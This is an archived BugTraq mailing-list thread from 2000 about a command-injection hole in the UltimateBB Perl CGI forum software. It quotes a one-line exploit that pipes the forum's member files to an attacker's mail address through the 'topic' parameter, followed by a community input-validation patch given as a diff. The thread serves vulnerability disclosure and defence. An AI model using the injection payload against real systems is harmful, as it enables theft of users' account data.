This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01BF7952.B555EE10 Content-Type: text/plain; charset="windows-1252" according to the folks at UBB, the latest version 5.43d, fixes this vulnerability. Has anyone been able to verify if this is in fact correct? Irwin > -----Original Message----- > From: Jordan Ritter [mailto:jpr5at_private] > Sent: Tuesday, February 15, 2000 8:48 PM > To: BUGTRAQat_private > Subject: Re: perl-cgi hole in UltimateBB by Infopop Corp. > > > On Mon, 14 Feb 2000, Kevin Hillabolt wrote: > > # It works on the full version also... > # > # Little different syntax: > # topic=012345.cgi|cat%20../Members/*|mail hackerat_private| > # (note the ../ on the Members. You have to go up a > directory to get the > # file. Maybe you could stop it via simple folder permissions??) > > Provided with no warranty. unescape() borrowed from the far superior > CGI.pm. It appears to work, but I haven't checked it for > completeness. > The ubb scripts are a programming disaster, and pass around > metachars and > filenames through form parameters, making input validation difficult. > The patch below selectively validates input based on the name of the > variable we're validating (i.e. only certain variables are dangerous; > others are just dumb and not a risk). It's better to try and > validate at > the top leven then code review the source and try to patch > every idiotic > mistake that was made. At the very least, this stops the > specific attack > that was posted. There could be other holes that this > doesn't cover, or > alternative ways to carry out the same attack. Hopefully > Infopop will get > their act together soon. > > I can't believe they distribute this crap as commercial software. > Actually, what I can't believe is how many people paid for > it. God help > us all. > > > --jordan > > > $ diff ubb_library.pl ubb_library.pl.orig > 84,93d83 > < # unescape URL-encoded data > < sub unescape { > < shift() if ref($_[0]); > < my $todecode = shift; > < return undef unless defined($todecode); > < $todecode =~ tr/+/ /; # pluses become spaces > < $todecode =~ s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge; > < return $todecode; > < } > < > 1047a1038 > > > 1112,1120d1102 > < # clean input > < if ($key =~ /^(forum|topic|number|replynum)$/i) { > < my($newval) = &unescape($val); > < > < if ($newval !~ /^([ -\@\w.]+)$/) { > < $val = "bad_input"; > < } > < } > < > 1266,1284d1247 > < > < my(@out); > < foreach $row (@in) { > < my($name,$value) = split ("=", $row); > < > < if ($name =~ /^(forum|topic|number|replynum)$/i) { > < my($newvalue) = &unescape($value); > < > < if ($newvalue !~ /^([ -\@\w.]+)$/) { > < $value = "bad_input"; > < } > < > < push @out, "$name=$value"; > < } else { > < push @out, $row; > < } > < } > < @in = @out; > ------_=_NextPart_000_01BF7952.B555EE10 Content-Type: application/octet-stream; name="Irwin Lazar (E-mail).vcf" Content-Disposition: attachment; filename="Irwin Lazar (E-mail).vcf" BEGIN:VCARD VERSION:2.1 N:Lazar;Irwin FN:Irwin Lazar (E-mail) ORG:The Burton Group (Formerly NetReference, Inc.) TITLE:Senior Consultant TEL;WORK;VOICE:(703) 742-9659 TEL;WORK;FAX:(703) 742-8038 ADR;WORK:;;45615 Willow Pond Plaza;Sterling;Va;20164;USA LABEL;WORK;ENCODING=QUOTED-PRINTABLE:45615 Willow Pond Plaza=0D=0ASterling, Va 20164=0D=0AUSA EMAIL;PREF;INTERNET:ilazarat_private REV:20000112T150132Z END:VCARD ------_=_NextPart_000_01BF7952.B555EE10--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:36:01 PDT